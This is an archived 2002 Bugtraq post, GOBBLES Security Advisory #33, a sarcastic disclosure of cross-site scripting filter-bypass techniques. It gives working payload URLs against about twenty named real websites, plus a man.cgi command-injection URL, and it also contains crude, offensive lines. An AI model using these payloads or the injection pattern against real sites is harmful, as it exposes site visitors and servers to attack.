GOBBLES SECURITY ADVISORY #33
From: Dave Ahmad (daat_private)
Date: Fri May 10 2002 - 11:44:48 PDT
Next message: bugzillaat_private: "[RHSA-2002:081-06] perl-Digest-MD5 UTF8 bug results in incorrect MD5 sums"
What follows is GOBBLES advisory #33. The original version was inappropriate for
the list (http://online.securityfocus.com/popups/forums/bugtraq/faq.shtml#0.1.3).
With the permission of GOBBLES, an edited advisory is now being sent out.
The original, unedited version is located at:
http://www.bugtraq.org/advisories/GOBBLES-33.txt
---
Hi,
We saw the Administrivia post today, so we decided to send this in. Hopefully
it's not too late.
The post mentioned that new forms of cross-site scripting attacks would be
accepted. Well, as you'll see, we have some nifty tricks that are discussed,
and also some major products are totally torn apart.
Most of the sites allow you to download their custom scripts (e.g. man.cgi) so
we believe we are justified in giving examples of sites that are affected,
especially since this has been the norm on the security lists for a while now.
Thanks to all the administrators who were good sports over this.
GOBBLES SECURITY
http://www.bugtraq.org/
GOBBLESat_private
GOBBLES SECURITY ADVISORY #33
Compass, Square, and Slide-rule
New Generation CSS
ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!
############################################################################
# #
# CROSS-SITE SCRIPTING VULNERABILITIES IN PROMINENT WEBSITES AND PRODUCTS #
# #
# #
############################################################################
ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!
I'm over it
You see I'm falling in the fast abyss
Clouded by memories of the past
At last I see
I hear it fading, I can't speak it
Oh yes you will dig my grave
You feeling, finding, always whining
Take my hand now be alive
You see I cannot be forsaken
Because I'm not the only one
We walk amongst you feeding, raping
Must we hide from everyone?
Before we begin, we'd like to mention that recently we've been overwhelmed
with emails from journalists asking us questions about our security group.
GOBBLES like this very much because it is sign of his crew becoming very
famous and ubiquitous. We be accused of seeking fame and job offers. To this
GOBBLES say no, we not after job offers, but yes, we after as much fame and
attention as possible and this is why we will be disclosing more serious
remote vulnerabilities in OS like Solaris and IRIX in near future. Remote
exploit for IRIX can then be complemented with upcoming GOBBLES IRIX
backdoor.
Current misinterpretation about what GOBBLES mean when he say he group
seeking worldwide fame, mostly stem from belief that GOBBLES is supporter of
non-disclosure and is being sarcastic. This is wrong, disclosure of
rpc.rwalld hole show GOBBLES not supporter of non-disclosure and current
development project 'lestat' for another default RPC service in Solaris is
leading to further proof that GOBBLES is avid supporter of full-disclosure,
especially because it great way to annoy as many Fascists, Communists, and
McCarthys as possible ;PPPPPPPPPPP. But GOBBLES primary motivation is
becoming as famous as possible.
We now co-existing with Bugtraq, making the peace, being ethical, etc.
BACKGROUND
==========
Been a lot of fanfare about cross-site scripting in recent times. Person
suggest changing acronym from CSS to XSS so it different from Cascading
Style Sheets, but this not really good move because XSS conflict with XML
Security Suite from IBM (they company who make computer systems, probably
not big fans of stem cell research HEHEHEHEHEHEHEHE).
When GOBBLES Security first dreamed of the CSS technique, pioneered it,
refined it, and perfected it, we knew of the dastardly tool of mass
destruction that had just materialized. Here was something that could make
Joe Average a security expert, something that could be wielded by the little
guy to sting and subdue the domineering commercial bullies. A well-planted
CSS attack can undermine the reputation of even the most stringent
corporations, thus making it one of the most effective political tools known
in cyberspace. It truly is the Queen's Gambit, the Power Set, the Homology
Group, and the Achilles Heel of the infosec world.
INNOVATIVE CSS TECHNIQUES
=========================
* JavaScript entities
- ---------------------
Only hotmail security historians like those at GOBBLES Security know of
obscure feature in JavaScript language that make it easy to bypass thing
like "<...>", "<script>...</script>", and "javascript:" filter for CSS
attack using JavaScript. That is thing called JavaScript entity. Like...
&{alert('GOBBLES')};
When url-encoded become...
%26%7balert%28%27GOBBLES%27%29%7d%3b
The beauty of this technique for the adorned CSS exploiter is that the
GOBBLES CSS JavaScript Entity can appear almost anywhere with good results.
Note that "CERT" page below make no mention of this at all and even say that
ampersand is not relied upon by current exploits. Well, now it is.
http://www.cert.org/tech_tips/malicious_code_mitigation.html
For reference, HTML4 specification only require you to encode the following:
; %3b
/ %2f
? %3f
: %3a
@ %40
= %3d
& %26
< %3c
> %3e
" %22
# %23
% %25
{ %7b
} %7d
| %7c
\ %5c
^ %5e
~ %7e
[ %5b
] %5d
` %60
Until now, that encoding information was private knowledge of the
underground. GOBBLES is about information dissemination and believe
information wants to be free, though. So really GOBBLES see no need why he
should have to justify the disclosure of the encoding techniques. If GOBBLES
didn't do it, someone would have, and it best this come from a whitehat
retard than from someone making the big dollar.
Sometimes in URLs below we can't encode parameter, but this no problem for
GOBBLES because smart thing to do is just not enter the character encoded,
i.e. enter it literally with no %XX, e.g. '>' gets entered as '>', i.e. '>'
does not get entered as '%3e'. Why? Because sometimes in URLs below we can't
encode parameter.
* HTML string completion / HTML closure
- ---------------------------------------
Principles are basically identical to SQL injection technique. Doesn't need
much coverage since it pretty obvious to anyone with rational mind. GOBBLES
will let "CERT" write a dissertation on it. Essentially...
*** HTML string completion:
<a href="[...]$user_provided">
Make $user_provided: " attribute="malicious_data
Then original text becomes
<a href="[...]" attribute="malicious data">
Good to make 'attribute' event handlers like onMouseOver, onLoad, onClick,
etc. But can just use common attribute like 'id' and just insert GOBBLES CSS
JavaScript Entity.
*** HTML closure:
<a href="[...]$user_provided">
Make $user_provided: "> <tag attribute="malicious data">
Then original text becomes
<a href="[...]"> <tag attribute="malicious data">">
Good way to introduce <script> tag, etc. Or GOBBLES CSS JavaScript Entity
can be inserted.
Again, these two are blatantly obvious and probably have many appearance on
the Vuln-Dev already. GOBBLES CSS JavaScript Entity Technique make them
almost obsolete.
THE VULNERABILITIES
===================
1. openbsd.org / man.cgi
- ------------------------
You can get source code like so:
http://www.openbsd.org/cgi-bin/man.cgi/source
Should be noted that up until a few months ago, '/usr/include' processing
was vulnerable to simple PERL open() attack.
sub include_output {
local($inc) = @_;
&http_header("text/plain");
open(I, "$inc") || do { print "open $inc: $!\n"; exit(1) };
while(<I>) { print }
close(I);
}
So you could do like...
http://www.openbsd.org/cgi-bin/man.cgi/usr/include;IFS=G;unameG-a;|
... work your way up to local access and core the box with your Solaris
locals. Then they try thing like -T taint switch, removing /bin/sh, etc. but
futile attempt since existence of GOBBLESpserver-ex.c that will be disclosed
soon (hehehe, Theo, I HATE YOU!).
We mention this in case other people using version of man.cgi from their
site from a while ago.
OK, for CSS hole, just a simple matter of linking to...
http://www.openbsd.org/cgi-bin/man.cgi?query=%26%7balert%28%27GOBBLES%27%29%7d
%3b&apropos=hehehe
Examine HTML source to see how GOBBLES CSS JavaScript Entity Technique bypasses
the most anal filtering, even when "javascript:..." not always appropriate
and automatic JavaScript event handlers don't apply.
<INPUT VALUE="&{alert('GOBBLES')};" NAME="query">
Shouldn't be too hard to think of how malicious website owner can use this
for CSS attacks against visitor web browser that implicitly trusts
openbsd.org -- and who wouldn't since it the cornerstone of security?
2. happyhacker.org / thttpd webserver proper / thttpd ssi program
- -----------------------------------------------------------------
The default 404 handling of the thttpd webserver is vulnerable to CSS
attacks. All you have to do is....
http://thttpd-site/>alert('GOBBLES');</script>/
OR
http://thttpd-site/cgi-bin/ssi/>alert('GOBBLES');</script>/
Note that it doesn't decode url-encoding, you may have mixed results using
spacing in the URL, and the default <script> language for Netscape (at
least) is JavaScript.
Examples:
http://www.happyhacker.org/>alert('GOBBLES');</script>/
http://www.happyhacker.org/cgi-bin/ssi/%3cp+align%3D%26%7balert%28%27GOBBLES%27
%29%7d%3b%3e
Both were tested against the latest stable version of thttpd from...
http://www.acme.com/software/thttpd/thttpd-2.20c.tar.gz
... so this time the developer can't downplay the findings of the GOBBLES
Security Research Organization like he did with our theoretically
exploitable off-by-one, nor can he invent fake CHANGELOG entries (google
cache catch you out there my friend).
3. thievco.com / Matt Wright's guestbook script
- -----------------------------------------------
GOBBLES regularly visit The Blue Boar's website in search of hacking
information, so it incumbent upon GOBBLES to alert world to presence of
cross-site scripting hole in The Blue Boar's website and, more importantly,
in Matt Wright's guestbook script.
Matt Wright's guestbook script can be found at:
http://worldwidemart.com/scripts/guestbook.shtml
To he credit, he has $allow_html variable that can strip "<...>" stuff, but
once again, GOBBLES trademarked JavaScript Entity CSS Technique come to the
rescue. Incidentally, The Blue Boar allows html in his guestbook fields, but
as we just said, the presence of this does not determine whether or not we
can use our CSS technique. We always can.
if ($FORM{'url'}) {
print GUEST "<a href=\"$FORM{'url'}\">$FORM{'realname'}</a>";
}
You see, even if html form do not have 'url' parameter, remote attacker can
still create their own local html form pointing at The Blue Boar's website
or some other site with Matt Wright's guestbook script. This permits them to
inject malicious data via 'url' parameter that will allow CSS attacks on
anyone viewing the guestbook.
Script can only be called with POST method, so it can't be linked to, but
this is moot point because with permanent malicious CSS data in actual
guestbook, attacker can just drop it there and leave, knowing that if site
store authentication information in cookies or whatever, anyone viewing
guestbook with JavaScript enabled will be slain by malicious code in
attacker guestbook entry.
This is obviously a very devastating vulnerability. CSS hole are sometimes
overlooked, but luckily in this world there are security masterminds with a
razor sharp logic -- they miss nothing. These masterminds are your only
salvation. Without their marvellous creativity and insight, the Internet
would be a very scary place indeed.
Hereeeeeeeeeeeeeeeeeeeeeee's Johnnnnnnnnnnnnnnnnnnnnnnnnnyyyyyyyyyyyyyy!
4. antionline.com / fatelabs.com / vbulletin php package
- --------------------------------------------------------
There are tons of bugs in the latest version of this package. It's
commercial, so you can only download a Lite version, but GOBBLES have a
network of contacts in the warez scene and was able to obtain both the
version 2.0.3 that Antionline is built on and the latest version.
Antionline switched from PERL to PHP last year.
GOBBLES have script that can ethically hack John Vranesevich's site in 5-10
seconds.
Only interested in CSS bugs here, though.
The bug is like vbulletin cross-site scripting hole revealed here:
http://online.securityfocus.com/archive/1/263609/2002-05-01/2002-05-07/0
But big difference is that GOBBLES CSS JavaScript Entity Technique and the
other techniques mentioned above make many, many, many more portions of the
code vulnerable.
Examples:
http://www.antionline.com/mod/index.php?redirect=&{alert('GOBBLES')};
http://forums.fatelabs.com/mod/index.php?redirect=&{alert('GOBBLES')};
Looking at HTML source show how GOBBLES CSS Javascript Entity can appear
anywhere in attribute value, which make it very flexible.
<input type="hidden" name="redirect"
value="/mod/index.php?redirect=&{alert('GOBBLES')};&[...]
FateLabs uses version 2.0.0 of this script which is just as vulnerable to
remote command execution.
5. cern.ch
- ----------
http://consult.cern.ch/xwho/people/>alert('GOBBLES');</script>
http://consult.cern.ch/xwho/people/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7
d
%3b%3e
Hacking is bad, you butt pirate.
6. cansecwest.com
- -----------------
http://www.cansecwest.com/register.cgi?Name=%26%7Balert%28%27GOBBLES%27%29%7D%3B
&Addr1=G&City=G&State=G&Country=G&Zip=G&Email=G%40G.G&Phone=G&rm=mode3
&session=729%3A601e5c2e26fa3c87e656ef1b484f8fc3
Session ID may be problem here.
7. sans.org / incidents.org / discus pro / htdig's htsearch
- -----------------------------------------------------------
http://forum.sans.org/cgi-bin/discus/board-profile.cgi?action=%3cp+align%3d
%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
http://forum.sans.org/cgi-bin/discus/board-search.cgi?query=%3cp+align%3d
%26%7balert%28%27GOBBLES%27%29%7d%3b (notice no trailing '>')
This is a commercial package, so we unable to do a full audit and narrow
down all problems in source, but GOBBLES team was able to bust 7 different
cross-site scripting attacks using sans.org cgi scripts in 10 minutes of
searching. GOBBLES expect that the forum itself will be heavily vulnerable
to CSS attack, and this very dangerous for sans.org because of way in which
they interact with their visitor member.
Both sans.org and incidents.org use htdig htsearch program. We know of one
CSS attack in this (probably many more), but since revelation of CSS hole
also give revelation of buffer overflow in C++ code, GOBBLES think it best
to leave that for future advisory all on its own. Hehehehehehe, give GOBBLES
time to write up remote brute forcing exploit again and wait for l0pht.com
to return with their htdig hehehehe J/K! :PPPPPPPPPPPPPPPPPPPPPPPP. This
hint for developer to look at code.
8. 2600.com
- -----------
http://www.2600.com/cgi-bin/covers.pl?issue=%26%7balert%28%27GOBBLES%27%29%7d%3b
in this day and age of security, especially with the fast pace that GOBBLES
sets as a standard. Gone are the days of password brute forcing, phf
attacks, and how2knowifyouhavefoundyournewageethicalhacker.
HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC
BBS Y0 BACK IN THE OLD SCHOOL DAYZ RPGS FIELD PHREAKING BACKPACKZ B00ZE
HACKING WANTED FOR UPCOMING 2600 MEETINGS HACKING
PHREAKING ********************************* PHREAKING
VIRII m0r3 buckt00th sn0tty-n0s3d 4cn3 VIRII
ANARCHY f4ct0ry f@s0z ANARCHY
CRACKING/CARDING CRACKING/CARDING
TELCO MANUALZ RADIOSHACK BACKYARD DRUG LABZ GFX CARDZ SERIAL PORT KRAYZEE
HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC
9. snort.org
- ------------
http://www.snort.org/external/?url=javascript:%22+onMouseOver%3d
%22alert('GOBBLES')%3b
Also, GOBBLES has discovered a Cross-Cross-Site Scripting (CCSS)(tm) class
of holes while researching the snort.org Cross-Site Scripting vulnerability.
This permit attacker to do like...
http://www.snort.org/external/?url=http://somesite/index.php?malicious_data
You see, sometimes thing like index.php will return QUERY_STRING in
displayed page.
Shouldn't be too hard to imagine the transitive nature of this attack -- we
have CSS, CCSS, CCCSS, CCCCSS, CCCCCSS, ..., C^nSS.
bash-2.05a$ SERIES="CSS";while true;do echo $SERIES;SERIES="C$SERIES";done
So if attacker can make site A cause CSS on site B and attacker can make
site B cause CSS on site C, then attacker can make site A cause CSS on site
C. This is hypothetical syllogism.
10. takedown.com / modified Matt Wright's guestbook script
- ----------------------------------------------------------
Same technique is used as for The Blue Boar's site. Hehehehe, you even see
where GOBBLES left Shimmy a message here:
http://www.takedown.com/guestbook/guestbook.html
But that not all! Hehehe, there more CGI fun on Shimomura's site that he
created for defamation remission, but GOBBLES will let you find it hehe. It
OK Tsutomu, GOBBLES still think you elite hehehehehehehehe ;>>>>>>. GOBBLES
know all the techniques: crazy monkey, sendmail, bind!
11. nessus.org / freebsd.org / cvsweb
- -------------------------------------
http://cgi.nessus.org/cgi-bin/cvsweb.cgi/%3cp+align%3D%26%7balert%28
%27GOBBLES%27%29%7d%3b%3e
http://www.freebsd.org/cgi/cvsweb.cgi/%3cp+align%3D%26%7balert%28
%27GOBBLES%27%29%7d%3b%3e
Hehehe, and a Theo bonus:
http://www.openbsd.org/cgi-bin/cvsweb/%3cp+align%3D%26%7balert%28
%27GOBBLES%27%29%7d%3b%3e
12. owasp.org
- -------------
http://owasp.org/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
These guys like to write all about web security, including cross-site
scripting attacks. You can read about it here:
http://www.owasp.org/asac/input_validation/css.shtml
13. whitehats.com
- -----------------
http://www.whitehats.com/cgi/arachNIDS/Search?search=&{alert('GOBBLES')};
That just an example of dozens of CSS holes found on the whitehats website
in different scripts, including the forums.
When he get out we will send him email informing him of all the CSS and
command execution bugs GOBBLES found on his website. GOBBLES appreciate work
of Max Vision in the community; we make heavy use of his BIND9 fingerprint
techniques and he keep a great database of signatures for snort that let us
know when we've been owned.
14. ciac.org / nfr.com / webglimpse
- -----------------------------------
>From ciac:
http://www.ciac.org/cgi-bin/webglimpse/www/htdocs/ciac/archive?query=%3cp+align
%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
http://hoaxbusters.ciac.org/cgi-bin/webglimpse-hoaxbusters/www/hoaxbusters/
archive?query=%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
>From nfr:
http://www.nfr.com/cgi-bin/nfrsearch?query=hehehe&id=2&whole=%26%7balert%28
%27GOBBLES%27%29%7d%3b
15. cerias.purdue.edu
- ---------------------
http://www.cerias.purdue.edu/search/results.php?search=%3cp+align%3D%26
%7balert%28document.location%29%7d%3b%3e
This script strip the single quotes, but any web puppy can get around this.
TEAM GOBBLES in a hurry to meet closing Bugtraq CSS deadline so we couldn't
check all scripts on this site, but because we fans of this site, we sent
administrator an email pointing out the problems and telling him where he
can find further information:
"pp. 544-547 of book _Practical Unix & Internet Security_ describe CGI
weakness in detail and you well-advised to purchase a copy of this book.
GOBBLES have this book on he shelf and wouldn't be what he is today if he
didn't read this amazing piece of literary accomplishment."
16. infowar.com
- ---------------
http://www.infowar.com/search/search_results.cfm?term1=
<script>alert('GOBBLES');</script>
There also several remote command execution vuln on Winny site. He been
notified.
17. grc.com
- -----------
http://grc.com/x/ne.dll?>alert('GOBBLES');</script>
18. acm.org
- -----------
http://campus.acm.org/public/search/results.cfm?query=%3C%2F
textarea%3E%3Cp+align%3D%26%7Balert%28%27GOBBLES%27%29%7D%3B
This good example of HTML closure technique, i.e. using </textarea> to break
out of one opened already and then busting cross-site scripting move in
regular fashion.
19. security.nnov.ru
- --------------------
http://security.nnov.ru/search/exploits.asp?keyword=&{alert('GOBBLES')};
GOBBLES certain he found this one before 3APA[...]A hehehehehe ;).
20. sun.com
- -----------
http://sunsolve.sun.com/pub-cgi/show.pl?target=%26%7balert%28%27GOBBLES%27
%29%7d%3b
Hehehehehe, 2+ default RPC remote root vulns coming to Bugtraq *VERY* soon.
GOBBLES will be making the exploits very easy to use this time, because we
had a lot of emails concerning rpc.rwalld from HotBabe, LinuxGal, etc.
saying rpc.rwalld impossible to use.
FINAL WORDS
===========
We have ethically disclosed CSS holes in a number of sites by co-existing
with Bugtraq and spreading the full-disclosure faith. We have also shared a
few nuggets of information with the community we love. Because of the
relatively low risk of the attack -- to say the least -- GOBBLES didn't find
it necessary to inform all of the administrators. And in certain respects,
GOBBLES think it really makes little difference to the security of the above
sites anyway...
Remember: all of the above sites are UNSAFE TO VISIT from untrusted
websites, and some are even unsafe to visit directly with scripting enabled
in your browser.
There are many self-proclaimed CSS experts out there who will litter your
inbox with their daily CSS discoveries, but there can only be one CSS king,
and that king is GOBBLES. Don't accept any imitations.
Sleep well, my friends.
This archive was generated by hypermail 2b30
: Fri May 10 2002 - 19:01:01 PDT